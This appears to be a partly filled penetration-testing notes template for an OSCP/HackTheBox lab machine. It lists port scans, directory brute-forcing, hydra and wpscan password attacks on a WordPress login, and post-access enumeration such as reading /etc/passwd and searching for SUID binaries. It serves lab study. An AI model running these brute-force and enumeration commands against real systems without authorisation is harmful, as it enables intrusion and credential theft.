HTB_AD_Test: Pentration Testing Report
| Name | item |
|---|---|
| Platform | OSCP |
| Date | 2025-09-19 21:06:57 |
| Auth | Blackwin |
| Tools | |
| Keywords | |
| Ip address | 10.10.11.51 |
| Flag | proof.txt: local.txt: |
1. Initial Reconasission
Port scanning
bash
# rustscan
rustscan -a 10.10.11.51 --scripts none --ulimit 5000 | tee scans/rustscan
#nmap scan
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.51 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',')
sudo nmap -p -sC -SV 10.10.11.51 -oN scans/nmap-all2. Enumeration
FTP Enum
ftp,lftp
SMB Enum
enum4linux
Web Enum
directory brute
bash
ffuf -u http://10.10.11.51/FUZZ -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://10.10.11.51/ -w /usr/share/wordlists/dirb/big.txtbrute force login
bash
hydra -l loly -P rockyou.txt 10.10.11.51 http-post-form "/wordpress/wp-login.php:F=Error" -V -t 5 -w 1 -o results.txt
wpscan --url http://10.10.11.51/wordpress -U loly -P rockyou.txt3. Initial Shell
4. Post-Enumeration
get flag: find / -name local.txt 2>/dev/null
get basic info:
- OS version:
- sudo version:
- psexec version:
- users: cat /etc/passwd
- flag: find / -name local.txt 2>/dev/null
- SUDI binaries:
- find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null
- find / -uid 0 -perm -6000 -type f 2>/dev/null